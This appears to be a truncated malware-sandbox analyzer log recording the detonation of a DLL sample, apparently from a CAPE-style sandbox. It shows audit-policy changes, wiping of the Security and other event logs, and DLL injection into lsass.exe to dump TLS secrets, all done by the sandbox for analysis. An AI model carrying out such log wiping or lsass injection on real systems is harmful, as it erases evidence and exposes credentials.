"log": "2025-11-14 14:52:10,430 [root] INFO: Date set to: 20251115T08:47:01, timeout set to: 200\n2025-11-15 08:47:01,228 [root] DEBUG: Starting analyzer from: C:\\yzxx4c5b\n2025-11-15 08:47:01,228 [root] DEBUG: Storing results at: C:\\zFLSjDX\n2025-11-15 08:47:01,228 [root] DEBUG: Pipe server name: \\\\.\\PIPE\\IoWoJfwM\n2025-11-15 08:47:01,228 [root] DEBUG: Python path: C:\\Users\\apogean\\AppData\\Local\\Programs\\Python\\Python311-32\n2025-11-15 08:47:01,228 [root] INFO: analysis running as an admin\n2025-11-15 08:47:01,228 [root] INFO: analysis package specified: \"dll\"\n2025-11-15 08:47:01,228 [root] DEBUG: importing analysis package module: \"modules.packages.dll\"...\n2025-11-15 08:47:01,759 [root] DEBUG: imported analysis package \"dll\"\n2025-11-15 08:47:01,759 [root] DEBUG: initializing analysis package \"dll\"...\n2025-11-15 08:47:01,774 [lib.common.common] INFO: wrapping\n2025-11-15 08:47:01,774 [lib.core.compound] INFO: C:\\Users\\apogean\\AppData\\Local\\Temp already exists, skipping creation\n2025-11-15 08:47:01,790 [root] DEBUG: New location of moved file: C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll\n2025-11-15 08:47:01,790 [root] INFO: Analyzer: Package modules.packages.dll does not specify a DLL option\n2025-11-15 08:47:01,806 [root] INFO: Analyzer: Package modules.packages.dll does not specify a DLL_64 option\n2025-11-15 08:47:01,806 [root] INFO: Analyzer: Package modules.packages.dll does not specify a loader option\n2025-11-15 08:47:01,821 [root] INFO: Analyzer: Package modules.packages.dll does not specify a loader_64 option\n2025-11-15 08:47:03,476 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.browser\"\n2025-11-15 08:47:03,482 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.curtain\"\n2025-11-15 08:47:03,528 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.digisig\"\n2025-11-15 08:47:03,733 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.disguise\"\n2025-11-15 
08:47:03,757 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.evtx\"\n2025-11-15 08:47:03,767 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.procmon\"\n2025-11-15 08:47:03,777 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.recentfiles\"\n2025-11-15 08:47:04,009 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'\n2025-11-15 08:47:04,009 [lib.api.screenshot] ERROR: No module named 'PIL'\n2025-11-15 08:47:04,009 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.screenshots\"\n2025-11-15 08:47:04,039 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.sysmon\"\n2025-11-15 08:47:04,078 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.tlsdump\"\n2025-11-15 08:47:04,086 [modules.auxiliary.watchdownloads] DEBUG: Could not load auxiliary module WatchDownloads due to 'No module named 'watchdog''\n2025-11-15 08:47:04,086 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.watchdownloads\"\n2025-11-15 08:47:04,088 [root] DEBUG: Initialized auxiliary module \"Browser\"\n2025-11-15 08:47:04,088 [root] DEBUG: attempting to configure 'Browser' from data\n2025-11-15 08:47:04,088 [root] DEBUG: module Browser does not support data configuration, ignoring\n2025-11-15 08:47:04,088 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.browser\"...\n2025-11-15 08:47:04,099 [root] DEBUG: Started auxiliary module modules.auxiliary.browser\n2025-11-15 08:47:04,099 [root] DEBUG: Initialized auxiliary module \"Curtain\"\n2025-11-15 08:47:04,099 [root] DEBUG: attempting to configure 'Curtain' from data\n2025-11-15 08:47:04,099 [root] DEBUG: module Curtain does not support data configuration, ignoring\n2025-11-15 08:47:04,099 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.curtain\"...\n2025-11-15 08:47:04,104 [root] DEBUG: Started auxiliary module modules.auxiliary.curtain\n2025-11-15 08:47:04,104 [root] DEBUG: Initialized auxiliary module \"DigiSig\"\n2025-11-15 08:47:04,104 [root] 
DEBUG: attempting to configure 'DigiSig' from data\n2025-11-15 08:47:04,104 [root] DEBUG: module DigiSig does not support data configuration, ignoring\n2025-11-15 08:47:04,104 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.digisig\"...\n2025-11-15 08:47:04,107 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature\n2025-11-15 08:47:04,539 [modules.auxiliary.digisig] DEBUG: File is not signed\n2025-11-15 08:47:04,539 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json\n2025-11-15 08:47:04,539 [root] DEBUG: Started auxiliary module modules.auxiliary.digisig\n2025-11-15 08:47:04,539 [root] DEBUG: Initialized auxiliary module \"Disguise\"\n2025-11-15 08:47:04,539 [root] DEBUG: attempting to configure 'Disguise' from data\n2025-11-15 08:47:04,539 [root] DEBUG: module Disguise does not support data configuration, ignoring\n2025-11-15 08:47:04,539 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.disguise\"...\n2025-11-15 08:47:04,544 [modules.auxiliary.disguise] INFO: Disguising GUID to 145a4b6a-fc8d-49b0-8ba3-d936855b2e01\n2025-11-15 08:47:04,544 [root] DEBUG: Started auxiliary module modules.auxiliary.disguise\n2025-11-15 08:47:04,544 [root] DEBUG: Initialized auxiliary module \"Evtx\"\n2025-11-15 08:47:04,544 [root] DEBUG: attempting to configure 'Evtx' from data\n2025-11-15 08:47:04,544 [root] DEBUG: module Evtx does not support data configuration, ignoring\n2025-11-15 08:47:04,544 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.evtx\"...\n2025-11-15 08:47:04,549 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Security State Change\" /success:enable /failure:enable\n2025-11-15 08:47:04,549 [root] DEBUG: Started auxiliary module modules.auxiliary.evtx\n2025-11-15 08:47:04,549 [root] DEBUG: Initialized auxiliary module \"Procmon\"\n2025-11-15 08:47:04,549 [root] DEBUG: attempting to configure 'Procmon' from data\n2025-11-15 
08:47:04,549 [root] DEBUG: module Procmon does not support data configuration, ignoring\n2025-11-15 08:47:04,549 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.procmon\"...\n2025-11-15 08:47:04,549 [root] DEBUG: Started auxiliary module modules.auxiliary.procmon\n2025-11-15 08:47:04,549 [root] DEBUG: Initialized auxiliary module \"RecentFiles\"\n2025-11-15 08:47:04,549 [root] DEBUG: attempting to configure 'RecentFiles' from data\n2025-11-15 08:47:04,554 [root] DEBUG: module RecentFiles does not support data configuration, ignoring\n2025-11-15 08:47:04,554 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.recentfiles\"...\n2025-11-15 08:47:04,559 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\IZIBpirCfXPkpIgQ.docm to disk.\n2025-11-15 08:47:04,689 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\qPtkBAPBexz.docx to disk.\n2025-11-15 08:47:04,720 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\iJhLwXWjTGpJi.rtf to disk.\n2025-11-15 08:47:04,744 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\pfYBaXHQVy.doc to disk.\n2025-11-15 08:47:04,764 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\FYraemJhMCalUUoe.docx to disk.\n2025-11-15 08:47:04,779 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\hTXfKuLyuLyj.doc to disk.\n2025-11-15 08:47:04,814 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\HXtRBxCOej.ppt to disk.\n2025-11-15 08:47:04,824 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\IndLsTZBZq.pptx to disk.\n2025-11-15 08:47:04,844 [modules.auxiliary.recentfiles] DEBUG: Wrote 'recentfile' C:\\Users\\apogean\\Documents\\EdgLSUUTVd.pptx to disk.\n2025-11-15 08:47:04,885 [modules.auxiliary.recentfiles] DEBUG: 
Wrote 'recentfile' C:\\Users\\apogean\\Documents\\MWjwhHEAsApE.pptx to disk.\n2025-11-15 08:47:04,894 [root] DEBUG: Started auxiliary module modules.auxiliary.recentfiles\n2025-11-15 08:47:04,894 [root] DEBUG: Initialized auxiliary module \"Screenshots\"\n2025-11-15 08:47:04,899 [root] DEBUG: attempting to configure 'Screenshots' from data\n2025-11-15 08:47:04,899 [root] DEBUG: module Screenshots does not support data configuration, ignoring\n2025-11-15 08:47:04,899 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.screenshots\"...\n2025-11-15 08:47:04,909 [modules.auxiliary.screenshots] WARNING: Python Image Library is not installed, screenshots are disabled\n2025-11-15 08:47:04,914 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots\n2025-11-15 08:47:04,914 [root] DEBUG: Initialized auxiliary module \"Sysmon\"\n2025-11-15 08:47:04,914 [root] DEBUG: attempting to configure 'Sysmon' from data\n2025-11-15 08:47:04,914 [root] DEBUG: module Sysmon does not support data configuration, ignoring\n2025-11-15 08:47:04,914 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.sysmon\"...\n2025-11-15 08:47:05,034 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Security System Extension\" /success:enable /failure:enable\n2025-11-15 08:47:05,207 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"System Integrity\" /success:enable /failure:enable\n2025-11-15 08:47:05,268 [root] WARNING: Cannot execute auxiliary module modules.auxiliary.sysmon: In order to use the Sysmon functionality, it is required to have the SMaster(64|32).exe file and sysmonconfig-export.xml file in the bin path. 
Note that the SMaster(64|32).exe files are just the standard Sysmon binaries renamed to avoid anti-analysis detection techniques.\n2025-11-15 08:47:05,268 [root] DEBUG: Initialized auxiliary module \"TLSDumpMasterSecrets\"\n2025-11-15 08:47:05,268 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data\n2025-11-15 08:47:05,268 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring\n2025-11-15 08:47:05,268 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.tlsdump\"...\n2025-11-15 08:47:05,275 [modules.auxiliary.tlsdump] INFO: lsass.exe found, pid 588\n2025-11-15 08:47:05,276 [lib.api.process] INFO: Monitor config for <Process 588 lsass.exe>: C:\\yzxx4c5b\\dll\\588.ini\n2025-11-15 08:47:05,284 [lib.api.process] INFO: Option 'tlsdump' with value '1' sent to monitor\n2025-11-15 08:47:05,290 [lib.api.process] INFO: 64-bit DLL to inject is C:\\yzxx4c5b\\dll\\UcXKmb.dll, loader C:\\yzxx4c5b\\bin\\XQZTKWcp.exe\n2025-11-15 08:47:05,319 [root] DEBUG: Loader: Injecting process 588 with C:\\yzxx4c5b\\dll\\UcXKmb.dll.\n2025-11-15 08:47:05,328 [root] DEBUG: 588: Python path set to 'C:\\Users\\apogean\\AppData\\Local\\Programs\\Python\\Python311-32'.\n2025-11-15 08:47:05,340 [root] DEBUG: 588: Disabling sleep skipping.\n2025-11-15 08:47:05,344 [root] DEBUG: 588: TLS secret dump mode enabled.\n2025-11-15 08:47:05,380 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"IPsec Driver\" /success:disable /failure:disable\n2025-11-15 08:47:05,399 [root] DEBUG: 588: RtlInsertInvertedFunctionTable 0x00007FFC1390090E, LdrpInvertedFunctionTableSRWLock 0x00007FFC13A5D510\n2025-11-15 08:47:05,409 [root] DEBUG: 588: Monitor initialised: 64-bit capemon loaded in process 588 at 0x00007FFBE2830000, thread 7368, image base 0x00007FF7C0B20000, stack from 0x0000001084073000-0x0000001084080000\n2025-11-15 08:47:05,419 [root] DEBUG: 588: Commandline: C:\\Windows\\system32\\lsass.exe\n2025-11-15 
08:47:05,431 [root] DEBUG: 588: Hooked 5 out of 5 functions\n2025-11-15 08:47:05,434 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.\n2025-11-15 08:47:05,439 [root] DEBUG: Successfully injected DLL C:\\yzxx4c5b\\dll\\UcXKmb.dll.\n2025-11-15 08:47:05,444 [lib.api.process] INFO: Injected into 64-bit <Process 588 lsass.exe>\n2025-11-15 08:47:05,444 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump\n2025-11-15 08:47:05,444 [root] DEBUG: Initialized auxiliary module \"WatchDownloads\"\n2025-11-15 08:47:05,444 [root] DEBUG: attempting to configure 'WatchDownloads' from data\n2025-11-15 08:47:05,444 [root] DEBUG: module WatchDownloads does not support data configuration, ignoring\n2025-11-15 08:47:05,444 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.watchdownloads\"...\n2025-11-15 08:47:05,444 [root] DEBUG: Started auxiliary module modules.auxiliary.watchdownloads\n2025-11-15 08:47:05,454 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other System Events\" /success:disable /failure:enable\n2025-11-15 08:47:05,500 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Logon\" /success:enable /failure:enable\n2025-11-15 08:47:05,545 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Logoff\" /success:enable /failure:enable\n2025-11-15 08:47:05,636 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Account Lockout\" /success:enable /failure:enable\n2025-11-15 08:47:05,782 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"IPsec Main Mode\" /success:disable /failure:disable\n2025-11-15 08:47:05,875 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"IPsec Quick Mode\" /success:disable /failure:disable\n2025-11-15 08:47:05,969 [modules.auxiliary.evtx] DEBUG: 
Enabling advanced logging -> auditpol /set /subcategory:\"IPsec Extended Mode\" /success:disable /failure:disable\n2025-11-15 08:47:06,095 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other Logon/Logoff Events\" /success:enable /failure:enable\n2025-11-15 08:47:06,195 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Network Policy Server\" /success:enable /failure:enable\n2025-11-15 08:47:06,295 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Special Logon\" /success:enable /failure:enable\n2025-11-15 08:47:06,373 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"File System\" /success:enable /failure:enable\n2025-11-15 08:47:06,473 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Registry\" /success:enable /failure:enable\n2025-11-15 08:47:06,757 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Kernel Object\" /success:enable /failure:enable\n2025-11-15 08:47:06,829 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"SAM\" /success:disable /failure:disable\n2025-11-15 08:47:06,908 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Certification Services\" /success:enable /failure:enable\n2025-11-15 08:47:07,018 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Handle Manipulation\" /success:disable /failure:disable\n2025-11-15 08:47:07,221 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Application Generated\" /success:enable /failure:enable\n2025-11-15 08:47:07,623 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"File Share\" /success:enable /failure:enable\n2025-11-15 08:47:07,701 [modules.auxiliary.evtx] DEBUG: Enabling 
advanced logging -> auditpol /set /subcategory:\"Filtering Platform Packet Drop\" /success:disable /failure:disable\n2025-11-15 08:47:07,812 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Filtering Platform Connection\" /success:disable /failure:disable\n2025-11-15 08:47:07,900 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other Object Access Events\" /success:disable /failure:disable\n2025-11-15 08:47:08,001 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Sensitive Privilege Use\" /success:disable /failure:disable\n2025-11-15 08:47:08,085 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Non Sensitive Privilege Use\" /success:disable /failure:disable\n2025-11-15 08:47:08,170 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other Privilege Use Events\" /success:disable /failure:disable\n2025-11-15 08:47:08,270 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"RPC Events\" /success:enable /failure:enable\n2025-11-15 08:47:08,339 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Audit Policy Change\" /success:enable /failure:enable\n2025-11-15 08:47:08,424 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Authentication Policy Change\" /success:enable /failure:enable\n2025-11-15 08:47:08,524 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"MPSSVC Rule-Level Policy Change\" /success:disable /failure:disable\n2025-11-15 08:47:08,862 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Filtering Platform Policy Change\" /success:disable /failure:disable\n2025-11-15 08:47:08,947 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set 
/subcategory:\"Other Policy Change Events\" /success:disable /failure:enable\n2025-11-15 08:47:09,016 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"User Account Management\" /success:enable /failure:enable\n2025-11-15 08:47:09,116 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Computer Account Management\" /success:enable /failure:enable\n2025-11-15 08:47:09,210 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Security Group Management\" /success:enable /failure:enable\n2025-11-15 08:47:09,279 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Distribution Group Management\" /success:enable /failure:enable\n2025-11-15 08:47:09,395 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Application Group Management\" /success:enable /failure:enable\n2025-11-15 08:47:09,480 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other Account Management Events\" /success:enable /failure:enable\n2025-11-15 08:47:09,578 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Directory Service Access\" /success:enable /failure:enable\n2025-11-15 08:47:09,680 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Directory Service Changes\" /success:enable /failure:enable\n2025-11-15 08:47:09,761 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Directory Service Replication\" /success:disable /failure:enable\n2025-11-15 08:47:09,861 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Detailed Directory Service Replication\" /success:disable /failure:disable\n2025-11-15 08:47:09,940 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Credential Validation\" 
/success:enable /failure:enable\n2025-11-15 08:47:10,032 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Kerberos Service Ticket Operations\" /success:enable /failure:enable\n2025-11-15 08:47:10,141 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Other Account Logon Events\" /success:enable /failure:enable\n2025-11-15 08:47:10,231 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:\"Kerberos Authentication Service\" /success:enable /failure:enable\n2025-11-15 08:47:10,344 [modules.auxiliary.evtx] DEBUG: Wiping Application\n2025-11-15 08:47:10,442 [modules.auxiliary.evtx] DEBUG: Wiping HardwareEvents\n2025-11-15 08:47:10,552 [modules.auxiliary.evtx] DEBUG: Wiping Internet Explorer\n2025-11-15 08:47:10,695 [modules.auxiliary.evtx] DEBUG: Wiping Key Management Service\n2025-11-15 08:47:10,876 [modules.auxiliary.evtx] DEBUG: Wiping OAlerts\n2025-11-15 08:47:10,956 [modules.auxiliary.evtx] DEBUG: Wiping Security\n2025-11-15 08:47:11,067 [modules.auxiliary.evtx] DEBUG: Wiping Setup\n2025-11-15 08:47:11,178 [modules.auxiliary.evtx] DEBUG: Wiping System\n2025-11-15 08:47:11,286 [modules.auxiliary.evtx] DEBUG: Wiping Windows PowerShell\n2025-11-15 08:47:11,419 [modules.auxiliary.evtx] DEBUG: Wiping Microsoft-Windows-Sysmon/Operational\n2025-11-15 08:47:11,479 [root] INFO: Restarting WMI Service\n2025-11-15 08:47:13,657 [root] DEBUG: package modules.packages.dll does not support configure, ignoring\n2025-11-15 08:47:13,657 [root] WARNING: configuration error for package modules.packages.dll: error importing data.packages.dll: No module named 'data.packages'\n2025-11-15 08:47:13,657 [lib.core.compound] INFO: C:\\Users\\apogean\\AppData\\Local\\Temp already exists, skipping creation\n2025-11-15 08:47:13,694 [lib.api.process] INFO: Successfully executed process from path \"C:\\Windows\\System32\\rundll32.exe\" with arguments 
\"\"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll\",#1\" with pid 1052\n2025-11-15 08:47:13,694 [lib.api.process] INFO: Monitor config for <Process 1052 rundll32.exe>: C:\\yzxx4c5b\\dll\\1052.ini\n2025-11-15 08:47:13,694 [lib.api.process] INFO: 32-bit DLL to inject is C:\\yzxx4c5b\\dll\\oLcKCMmD.dll, loader C:\\yzxx4c5b\\bin\\DbbZncw.exe\n2025-11-15 08:47:13,772 [root] DEBUG: Loader: Injecting process 1052 (thread 3260) with C:\\yzxx4c5b\\dll\\oLcKCMmD.dll.\n2025-11-15 08:47:13,788 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.\n2025-11-15 08:47:13,788 [root] DEBUG: Successfully injected DLL C:\\yzxx4c5b\\dll\\oLcKCMmD.dll.\n2025-11-15 08:47:13,807 [lib.api.process] INFO: Injected into 32-bit <Process 1052 rundll32.exe>\n2025-11-15 08:47:15,811 [lib.api.process] INFO: Successfully resumed <Process 1052 rundll32.exe>\n2025-11-15 08:47:15,873 [root] DEBUG: 1052: Python path set to 'C:\\Users\\apogean\\AppData\\Local\\Programs\\Python\\Python311-32'.\n2025-11-15 08:47:15,873 [root] DEBUG: 1052: Disabling sleep skipping.\n2025-11-15 08:47:15,873 [root] DEBUG: 1052: Dropped file limit defaulting to 100.\n2025-11-15 08:47:15,951 [root] DEBUG: 1052: YaraInit: Compiled 43 rule files\n2025-11-15 08:47:15,983 [root] DEBUG: 1052: YaraInit: Compiled rules saved to file C:\\yzxx4c5b\\data\\yara\\capemon.yac\n2025-11-15 08:47:15,983 [root] DEBUG: 1052: YaraScan: Scanning 0x00960000, size 0x136e8\n2025-11-15 08:47:15,983 [root] DEBUG: 1052: Monitor initialised: 32-bit capemon loaded in process 1052 at 0x72220000, thread 3260, image base 0x960000, stack from 0x493000-0x4a0000\n2025-11-15 08:47:15,998 [root] DEBUG: 1052: Commandline: \"C:\\Windows\\System32\\rundll32.exe\" \"C:\\Users\\apogean\\AppData\\Local\\Temp\\cf9cdd5d26283d31c43e.dll\",#1\n2025-11-15 08:47:16,108 [root] DEBUG: 1052: hook_api: LdrpCallInitRoutine export address 0x77A32A30 obtained via GetFunctionAddress\n2025-11-15 08:47:16,108 [root] DEBUG: 1052: hook_api: Warning - 
CreateProcessA export address 0x76364110 differs from GetProcAddress -> 0x72A822A0 (AcLayers.DLL::0x222a0)\n2025-11-15 08:47:16,123 [root] DEBUG: 1052: hook_api: Warning - CreateProcessW export address 0x763488E0 differs from GetProcAddress -> 0x72A824E0 (AcLayers.DLL::0x224e0)\n2025-11-15 08:47:16,123 [root] DEBUG: 1052: hook_api: Warning - WinExec export address 0x7638E1C0 differs from GetProcAddress -> 0x72A827A0 (AcLayers.DLL::0x227a0)\n2025-11-15 08:47:16,186 [root] WARNING: b'Unable to place hook on GetCommandLineA'\n2025-11-15 08:47:16,186 [root] DEBUG: 1052: set_hooks: Unable to hook GetCommandLineA\n2025-11-15 08:47:16,186 [root] WARNING: b'Unable to place hook on GetCommandLineW'\n2025-11-15 08:47:16,186 [root] DEBUG: 1052: set_hooks: Unable to hook GetCommandLineW\n2025-11-15 08:47:16,264 [root] DEBUG: 1052: Hooked 625 out of 627 functions\n2025-11-15 08:47:16,264 [root] DEBUG: 1052: Syscall hook installed, syscall logging level 1\n2025-11-15 08:47:16,264 [root] DEBUG: 1052: RestoreHeaders: Restored original import table.\n2025-11-15 08:47:16,264 [root] INFO: Loaded monitor into process with pid 1052\n2025-11-15 08:47:16,280 [root] DEBUG: 1052: caller_dispatch: Added region at 0x00960000 to tracked regions list (ntdll::memcpy returns to 0x00965F1A, thread 3260).\n2025-11-15 08:47:16,280 [root] DEBUG: 1052: YaraScan: Scanning 0x00960000, size 0x136e8\n2025-11-15 08:47:16,280 [root] DEBUG: 1052: ProcessImageBase: Main module image at 0x00960000 unmodified (entropy change 0.000000e+00)\n2025-11-15 08:47:16,295 [root] DEBUG: 1052: InstrumentationCallback: Added region at 0x76352B4C (base 0x76330000) to tracked regions list (thread 3260).\n2025-11-15 08:47:16,295 [root] DEBUG: 1052: ProcessTrackedRegion: Region at 0x76330000 mapped as \\Device\\HarddiskVolume2\\Windows\\SysWOW64\\kernel32.dll is in known range, skipping\n2025-11-15 08:47:16,311 [root] DEBUG: 1052: ProcessTrackedRegion: Region at 0x76330000 mapped as 
\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\kernel32.dll is in known range, skipping\n2025-11-15 08:47:16,436 [root] DEBUG: 1052: InstrumentationCallback: Added region at 0x7607413C (base 0x75F30000) to tracked regions list (thread 3260).\n2025-11-15 08:47:16,436 [root] DEBUG: 1052: ProcessTrackedRegion: Region at 0x75F30000 mapped as \\Device\\HarddiskVolume2\\Windows\\SysWOW64\\KernelBase.dll is in known range, skipping\n2025-11-15 08:47:16,483 [root] DEBUG: 1052: DLL loaded at 0x730A0000: C:\\Windows\\SYSTEM32\\TextShaping (0x94000 bytes).\n2025-11-15 08:47:16,514 [root] DEBUG: 1052: DLL loaded at 0x73AE0000: C:\\Windows\\system32\\uxtheme (0x74000 bytes).\n2025-11-15 08:47:16,530 [root] DEBUG: 1052: DLL loaded at 0x76620000: C:\\Windows\\System32\\MSCTF (0xd4000 bytes).\n2025-11-15 08:47:16,561 [root] DEBUG: 1052: set_hooks_by_export_directory: Hooked 0 out of 627 functions\n2025-11-15 08:47:16,561 [root] DEBUG: 1052: DLL loaded at 0x74E50000: C:\\Windows\\SYSTEM32\\kernel.appcore (0xf000 bytes).\n2025-11-15 08:47:16,577 [root] DEBUG: 1052: DLL loaded at 0x75E60000: C:\\Windows\\System32\\bcryptPrimitives (0x5f000 bytes).\n2025-11-15 08:47:16,586 [root] DEBUG: 1052: DLL loaded at 0x73F80000: C:\\Windows\\SYSTEM32\\ntmarta (0x29000 bytes).\n2025-11-15 08:47:16,586 [root] DEBUG: 1052: DLL loaded at 0x71E40000: C:\\Windows\\System32\\CoreMessaging (0x9b000 bytes).\n2025-11-15 08:47:16,591 [root] DEBUG: 1052: DLL loaded at 0x72EB0000: C:\\Windows\\SYSTEM32\\wintypes (0xdb000 bytes).\n2025-11-15 08:47:16,591 [root] DEBUG: 1052: DLL loaded at 0x71EE0000: C:\\Windows\\System32\\CoreUIComponents (0x27e000 bytes).\n2025-11-15 08:47:16,591 [root] DEBUG: 1052: DLL loaded at 0x72160000: C:\\Windows\\SYSTEM32\\textinputframework (0xba000 bytes).\n2025-11-15 08:47:27,194 [root] DEBUG: 588: TLS 1.2 secrets logged to: C:\\zFLSjDX\\tlsdump\\tlsdump.log\n2025-11-14 04:25:26,025 [root] INFO: Analysis timeout hit, terminating analysis\n2025-11-14 04:25:26,025 [lib.api.process] 
INFO: Terminate event set for <Process 1052 rundll32.exe>\n2025-11-14 04:25:26,025 [root] DEBUG: 1052: Terminate Event: Attempting to dump process 1052\n2025-11-14 04:25:27,572 [root] DEBUG: 1052: DoProcessDump: Skipping process dump as code is identical on disk.\n2025-11-14 04:25:27,588 [lib.api.process] INFO: Termination confirmed for <Process 1052 rundll32.exe>\n2025-11-14 04:25:27,588 [root] INFO: Terminate event set for process 1052\n2025-11-14 04:25:27,588 [root] INFO: Created shutdown mutex\n2025-11-14 04:25:27,588 [root] DEBUG: 1052: Terminate Event: monitor shutdown complete for process 1052\n2025-11-14 04:25:28,603 [root] INFO: Shutting down package\n2025-11-14 04:25:28,603 [root] INFO: Stopping auxiliary modules\n2025-11-14 04:25:28,603 [root] INFO: Stopping auxiliary module: Browser\n2025-11-14 04:25:28,603 [root] INFO: Stopping auxiliary module: Curtain\n2025-11-14 04:25:28,822 [lib.common.results] INFO: Uploading file C:\\curtain.log to curtain/1763123128.8223877.curtain.log; Size is 4096; Max size: 